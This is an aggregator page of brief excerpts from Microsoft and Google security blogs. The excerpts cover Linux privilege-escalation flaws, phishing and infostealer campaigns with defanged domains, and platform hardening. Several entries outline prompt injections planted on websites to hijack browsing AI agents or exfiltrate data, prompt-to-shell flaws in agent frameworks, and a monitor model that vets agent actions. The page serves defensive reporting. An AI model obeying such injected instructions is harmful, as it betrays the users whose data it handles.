If you own, create, or maintain online services and web portals, you’re probably aware of the dramatic upswing in DDoS attacks on your domains.

Whether you are responsible for a single public website or a large portfolio of consumer-facing applications, defending against modern DDoS attacks means more than just absorbing traffic.

The nature of modern DDoS attacksEarly DDoS attacks were largely about volume.

Modern DDoS attacks are more nuanced.

When attack traffic looks like normal user traffic, typical network-level blocklists aren’t very effective.

3 days, 4 hours назад @ microsoft.com
Undermining the trust boundary: Investigating a stealthy intrusion through third-party compromise
Undermining the trust boundary: Investigating a stealthy intrusion through third-party compromise Undermining the trust boundary: Investigating a stealthy intrusion through third-party compromise

Days 40–60: Lateral movement and remote accessThe threat actor leveraged harvested credentials and covert connectivity to move laterally across devices, including highly sensitive assets.

Initial accessDuring the investigation, two internet-exposed web servers, WEB-01 and WEB-02, were identified as the earliest known compromised assets.

Enable detailed logging and monitoring on web servers and actively watch for anomalies (such as unexpected file changes or suspicious web requests).

Learn moreFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To hear stories and insights from the Microsoft Threat Intelligence …

3 days, 5 hours назад @ microsoft.com
Active attack: Dirty Frag Linux vulnerability expands post-compromise risk
Active attack: Dirty Frag Linux vulnerability expands post-compromise risk Active attack: Dirty Frag Linux vulnerability expands post-compromise risk

Public reporting and proof-of-concept activity indicate the exploit is designed to provide more reliable privilege escalation than traditional race-condition-dependent Linux local privilege escalation techniques.

Dirty Frag may be leveraged after initial compromise through SSH access, web-shell execution, container escape, or compromise of a low-privileged account.

Why Dirty Frag mattersLocal privilege escalation vulnerabilities are frequently used by threat actors after initial access to expand control over a compromised environment.

Dirty Frag is notable because it introduces multiple kernel attack paths involving rxrpc and esp/xfrm networking components to improve exploitation reliabilit…

1 week назад @ microsoft.com
When prompts become shells: RCE vulnerabilities in AI agent frameworks
When prompts become shells: RCE vulnerabilities in AI agent frameworks When prompts become shells: RCE vulnerabilities in AI agent frameworks

The AI model itself isn’t the issue as it’s behaving exactly as designed by parsing language into tool schemas.

As part of our mission to make AI systems more secure and eliminate new class of vulnerabilities, we’re launching a research series focused on identifying vulnerabilities in popular AI agent frameworks.

A representative case study: Semantic KernelSemantic Kernel is Microsoft’s open-source framework for building AI agents and integrating AI models into applications.

During our security research into the Semantic Kernel framework, we identified and disclosed two critical vulnerabilities: CVE-2026-25592 and CVE-2026-26030.

With this understanding of how a Semantic Kernel agent perfor…

1 week, 1 day назад @ microsoft.com
World Passkey Day: Advancing passwordless authentication
World Passkey Day: Advancing passwordless authentication World Passkey Day: Advancing passwordless authentication

World Passkey Day is a chance to reflect on progress toward a shared goal: reducing our reliance on passwords and other phishable authentication methods by accelerating passkey adoption.

In partnership with the FIDO Alliance, Microsoft is committed to advancing passkey adoption through ongoing standards work, active participation in working groups, and other contributions to a passwordless future.

This means passkey users can’t be tricked into signing in to a malicious lookalike website, and a passkey is unusable unless the user is present and consenting.

Get started with a phishing-resistant passwordless authentication deployment in Microsoft Entra ID.

4FIDO Alliance Champions Widespread P…

1 week, 1 day назад @ microsoft.com
​​Microsoft named an overall leader in KuppingerCole Analyst’s 2026 Emerging AI Security Operations Center (SOC) report ​​
​​Microsoft named an overall leader in KuppingerCole Analyst’s 2026 Emerging AI Security Operations Center (SOC) report ​​ ​​Microsoft named an overall leader in KuppingerCole Analyst’s 2026 Emerging AI Security Operations Center (SOC) report ​​

KuppingerCole Analysts’ 2026 Emerging AI Security Operations Center (SOC) reflects this shift clearly: the future of security automation is not defined by static rules or isolated workflows, but by intelligence‑driven automation that supports analyst decision‑making across the full security lifecycle.

As KuppingerCole’s research makes clear, it is becoming a foundational element of modern security operations.

Read the Emerging AI Security Operations Center (SOC) report to learn more.

To learn more about Microsoft Security solutions, visit our website.

Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

1 week, 2 days назад @ microsoft.com
ClickFix campaign uses fake macOS utilities lures to deliver infostealers
ClickFix campaign uses fake macOS utilities lures to deliver infostealers ClickFix campaign uses fake macOS utilities lures to deliver infostealers

We’re classifying these as a loader install campaign, a script install campaign, and a helper install campaign.

Payload delivery.

]com Domain Payload delivery vcopp[.

]com Domain Payload delivery kcbps[.

]com Domain Payload delivery jpbassin[.

1 week, 2 days назад @ microsoft.com
Breaking the code: Multi-stage ‘code of conduct’ phishing campaign leads to AiTM token compromise
Breaking the code: Multi-stage ‘code of conduct’ phishing campaign leads to AiTM token compromise Breaking the code: Multi-stage ‘code of conduct’ phishing campaign leads to AiTM token compromise

Microsoft Defender detectionsMicrosoft Defender customers can refer to the list of applicable detections below.

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

]com Domain Domain hosting sender email address 2026-04-14 2026-04-16 Gadellinet[.

]com Domain Domain hosting sender email address 2026-04-14 2026-04-16 Harteprn[.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen…

1 week, 4 days назад @ microsoft.com
Breaking the code: Multi-stage ‘code of conduct’ phishing campaign leads to AiTM token compromise
Breaking the code: Multi-stage ‘code of conduct’ phishing campaign leads to AiTM token compromise Breaking the code: Multi-stage ‘code of conduct’ phishing campaign leads to AiTM token compromise

Microsoft Defender detectionsMicrosoft Defender customers can refer to the list of applicable detections below.

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

]com Domain Domain hosting sender email address 2026-04-14 2026-04-16 Gadellinet[.

]com Domain Domain hosting sender email address 2026-04-14 2026-04-16 Harteprn[.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen…

1 week, 4 days назад @ microsoft.com
CVE-2026-31431: Copy Fail vulnerability enables Linux root privilege escalation across cloud environments
CVE-2026-31431: Copy Fail vulnerability enables Linux root privilege escalation across cloud environments CVE-2026-31431: Copy Fail vulnerability enables Linux root privilege escalation across cloud environments

Microsoft Defender is investigating a high-severity local privilege escalation vulnerability (CVE-2026-31431) affecting multiple major Linux distributions including Red Hat, SUSE, Ubuntu, and AWS Linux.

CVE-2026-31431 (also known as “Copy Fail”) is a high‑severity local privilege escalation (LPE) vulnerability affecting the Linux kernel’s cryptographic subsystem.

Tactic Observed activity Microsoft Defender coverage Execution Exploitation of CVE-2026-31431 Microsoft Defender Antivirus– Exploit:Linux/CopyFailExpDl.A– Exploit:Python/CopyFail.A– Exploit:Linux/CVE-2026-31431.A– Behavior:Linux/CVE-2026-31431Microsoft Defender for Endpoint– Possible CVE-2026-31431 (“Copy Fail”) vulnerability explo…

1 week, 6 days назад @ microsoft.com
Google Online Security Blog Google Online Security Blog
последний пост 3 weeks назад
AI threats in the wild: The current state of prompt injections on the web
AI threats in the wild: The current state of prompt injections on the web AI threats in the wild: The current state of prompt injections on the web

Here, threat actors may simply seed prompt injections on websites in hope of corrupting AI systems that browse them.

Early experiments revealed a significant volume of "benign" prompt injection text, which illustrates the complexity of distinguishing between functional threats and harmless content.

Many prompt injections were found in research papers, educational blog posts, or security articles discussing this very topic.

(Source: GitHub/swisskyrepo)When searching for prompt injections naively, the majority of detections are benign content – false positives in our case.

Malicious: ExfiltrationWe were able to observe a small number of prompt injections that aim at theft of data.

3 weeks назад @ security.googleblog.com
Bringing Rust to the Pixel Baseband
Bringing Rust to the Pixel Baseband Bringing Rust to the Pixel Baseband

Recognizing the risks associated within the complex modem firmware, Pixel 9 shipped with mitigations against a range of memory-safety vulnerabilities.

Following our previous discussion on "Deploying Rust in Existing Firmware Codebases", this post shares a concrete application: integrating a memory-safe Rust DNS(Domain Name System) parser into the modem firmware.

Hook-up Rust to modem firmwareBefore building the Rust DNS library, we defined several Rust unit tests to cover basic arithmetic, dynamic allocations, and FFI to verify the integration of Rust with the existing modem firmware code base.

Pixel modem firmware already has a well-tested and specialized global memory allocation system to…

1 month назад @ security.googleblog.com
Protecting Cookies with Device Bound Session Credentials
Protecting Cookies with Device Bound Session Credentials Protecting Cookies with Device Bound Session Credentials

This project represents a significant step forward in our ongoing efforts to combat session theft, which remains a prevalent threat in the modern security landscape.

Session theft typically occurs when a user inadvertently downloads malware onto their device.

Once active, the malware can silently extract existing session cookies from the browser or wait for the user to log in to new accounts, before exfiltrating these tokens to an attacker-controlled server.

How DBSC WorksDBSC protects against session theft by cryptographically binding authentication sessions to a specific device.

The issuance of new short-lived session cookies is contingent upon Chrome proving possession of the correspondi…

1 month назад @ security.googleblog.com
Google Workspace’s continuous approach to mitigating indirect prompt injections
Google Workspace’s continuous approach to mitigating indirect prompt injections Google Workspace’s continuous approach to mitigating indirect prompt injections

Staying ahead of the latest indirect prompt injection attacks is critical to our mission of securing Workspace with Gemini.

In our previous blog “Mitigating prompt injection attacks with a layered defense strategy”, we reviewed the layered architecture of our IPI defenses.

Synthetic data generationAfter we discover, curate, and catalog new attacks, we use Simula to generate synthetic data expanding these new attacks.

We partition the synthetic data described above into separate training and validation sets to ensure performance is evaluated against held-out examples.

This process leverages the newly generated synthetic attack data described on this blog, to create a robust, end-to-end evalu…

1 month, 1 week назад @ security.googleblog.com
VRP 2025 Year in Review
VRP 2025 Year in Review VRP 2025 Year in Review

2025 marked a special year in the history of vulnerability rewards and bug bounty programs at Google: our 15th anniversary 🎉🎉🎉!

Coming back to 2025 specifically, our VRP once again confirmed the ongoing value of engaging with the external security research community to make Google and its products safer.

Vulnerability Reward Program 2025 in NumbersWant to learn more about who’s reporting to the VRP?

Tip: Want to be informed of new developments and events around our Vulnerability Reward Program?

Follow the Google VRP channel on X to stay in the loop and be sure to check out the Security Engineering blog, which covers topics ranging from VRP updates to security practices and vulnerability des…

1 month, 2 weeks назад @ security.googleblog.com
Security for the Quantum Era: Implementing Post-Quantum Cryptography in Android
Security for the Quantum Era: Implementing Post-Quantum Cryptography in Android Security for the Quantum Era: Implementing Post-Quantum Cryptography in Android

To stay ahead of the curve, the technology industry must undertake a proactive, multi-year migration to Post-Quantum Cryptography (PQC).

To bring these critical protections to the wider developer community with minimal friction, the transition will be supported through Play App Signing.

Play App Signing leverages Google Cloud KMS, which helps ensure industry-leading compliance standards, to secure signing keys.

Empower Developers : The inclusion of ML-DSA support within Android Keystore and Play App Signing allows developers to safeguard their users and application.

: The inclusion of ML-DSA support within Android Keystore and Play App Signing allows developers to safeguard their users and …

1 month, 3 weeks назад @ security.googleblog.com
Cultivating a robust and efficient quantum-safe HTTPS
Cultivating a robust and efficient quantum-safe HTTPS Cultivating a robust and efficient quantum-safe HTTPS

Today we're announcing a new program in Chrome to make HTTPS certificates secure against quantum computers.

Instead, Chrome, in collaboration with other partners, is developing an evolution of HTTPS certificates based on Merkle Tree Certificates (MTCs), currently in development in the PLANTS working group.

Since MTC technology shares significant architectural similarities with CT, these operators are uniquely qualified to ensure MTCs are able to get off the ground quickly and successfully.

The Chrome Quantum-resistant Root Program will operate alongside our existing Chrome Root Program to ensure a risk-managed transition that maintains the highest levels of security for all users.

First, we…

2 months, 2 weeks назад @ security.googleblog.com
Staying One Step Ahead: Strengthening Android’s Lead in Scam Protection
Staying One Step Ahead: Strengthening Android’s Lead in Scam Protection Staying One Step Ahead: Strengthening Android’s Lead in Scam Protection

For Majik, Scam Detection was the intervention he needed: “The warning is what made me pause and avoid a bad situation”.

As scammers evolve their tactics and create more convincing and personalized threats, we’re using the best of Google AI to stay one step ahead.

Expanding Scam Detection for Calls to Samsung DevicesTo help protect you during phone calls, Scam Detection alerts you if a caller uses speech patterns commonly associated with fraud.

Scam Detection for phone calls on Google Pixel devices is available in the U.S., Australia, Canada, India, Ireland, and the UK.

Powered by Gemini’s on-device model, Scam Detection provides intelligent protection against scam calls while ensuring that…

2 months, 2 weeks назад @ security.googleblog.com
Keeping Google Play & Android app ecosystems safe in 2025
Keeping Google Play & Android app ecosystems safe in 2025 Keeping Google Play & Android app ecosystems safe in 2025

Upgrading Google Play’s AI-powered, multi-layered user protectionsWe’ve seen a clear impact from these safety efforts on Google Play.

As Android’s built-in defense against malware and unwanted software, Google Play Protect now scans over 350 billion Android apps daily.

This proactive protection constantly checks both Play apps and those from other sources to ensure they are not potentially harmful.

Looking aheadOur top priority remains making Google Play and Android the most trusted app ecosystems for everyone.

Thank you for being part of the Google Play and Android community as we work together to build a safer app ecosystem.

2 months, 3 weeks назад @ security.googleblog.com
New Android Theft Protection Feature Updates: Smarter, Stronger
New Android Theft Protection Feature Updates: Smarter, Stronger New Android Theft Protection Feature Updates: Smarter, Stronger

That’s why we're committed to providing multi-layered defenses that help protect you before, during, and after a theft attempt.

Today, we're announcing a powerful set of theft protection feature updates that build on our existing protections, designed to give you greater peace of mind by making your device a much harder target for criminals.

These updates are now available for Android devices running Android 16+.

More User Control for Failed Authentications: In Android 15, we launched Failed Authentication Lock, a feature that automatically locks the device's screen after excessive failed authentication attempts.

This feature is now getting a new dedicated enable/disable toggle in settings,…

3 months, 2 weeks назад @ security.googleblog.com
HTTPS certificate industry phasing out less secure domain validation methods
HTTPS certificate industry phasing out less secure domain validation methods HTTPS certificate industry phasing out less secure domain validation methods

These initiatives, driven by Ballots SC-080, SC-090, and SC-091, will sunset 11 legacy methods for Domain Control Validation.

What’s Domain Control Validation?

Domain Control Validation is a security-critical process designed to ensure certificates are only issued to the legitimate domain operator.

Sunsetted methods relying on email:Sunsetted methods relying on phone:Sunsetted method relying on a reverse lookup:For everyday users, these changes are invisible - and that’s the point.

These changes push the ecosystem toward standardized (e.g., ACME), modern, and auditable Domain Control Validation methods.

5 months назад @ security.googleblog.com
Further Hardening Android GPUs
Further Hardening Android GPUs Further Hardening Android GPUs

Partnership with ArmOur goal is to raise the bar on GPU security, ensuring the Mali GPU driver and firmware remain highly resilient against potential threats.

We partnered with Arm to conduct an analysis of the Mali driver, used on approximately 45% of Android devices.

This approach allowed us to roll out the new security policy broadly while minimizing the impact on developers.

This effort spans across Android and Android OEMs, and required close collaboration with Arm.

The Android security team is committed to collaborating with ecosystem partners to drive broader adoption of this approach to help harden the GPU.

5 months, 1 week назад @ security.googleblog.com
Architecting Security for Agentic Capabilities in Chrome
Architecting Security for Agentic Capabilities in Chrome Architecting Security for Agentic Capabilities in Chrome

We built on Gemini's existing protections and agent security principles and have implemented several new layers for Chrome.

To further bolster model alignment beyond spotlighting, we’re introducing the User Alignment Critic — a separate model built with Gemini that acts as a high-trust system component.

A flow chart that depicts the User Alignment Critic: a trusted component that vets each action before it reaches the browser.

The User Alignment Critic runs after the planning is complete to double-check each proposed action.

Looking forwardThe upcoming introduction of agentic capabilities in Chrome brings new demands for browser security, and we've approached this challenge with the same ri…

5 months, 1 week назад @ security.googleblog.com
Android expands pilot for in-call scam protection for financial apps
Android expands pilot for in-call scam protection for financial apps Android expands pilot for in-call scam protection for financial apps

Android uses the best of Google AI and our advanced security expertise to tackle mobile scams from every angle.

Over the last few years, we’ve launched industry-leading features to detect scams and protect users across phone calls, text messages and messaging app chat notifications.

To help combat these types of financial scams, we launched a pilot earlier this year in the UK focused on in-call protections for financial apps.

The UK pilot of Android’s in-call scam protections has already helped thousands of users end calls that could have cost them a significant amount of money.

We’ve also started to pilot this protection with more app types, including peer-to-peer (P2P) payment apps.

5 months, 1 week назад @ security.googleblog.com
Android Quick Share Support for AirDrop: A Secure Approach to Cross-Platform File Sharing
Android Quick Share Support for AirDrop: A Secure Approach to Cross-Platform File Sharing Android Quick Share Support for AirDrop: A Secure Approach to Cross-Platform File Sharing

Secure by DesignWe built Quick Share’s interoperability support for AirDrop with the same rigorous security standards that we apply to all Google products.

Secure Sharing Channel: The communication channel itself is hardened by our use of Rust to develop this feature.

On Android, security is built in at every layer.

On Android, security is built in at every layer.

Secure Sharing Using AirDrop's "Everyone" ModeTo ensure a seamless experience for both Android and iOS users, Quick Share currently works with AirDrop's "Everyone for 10 minutes" mode.

5 months, 3 weeks назад @ security.googleblog.com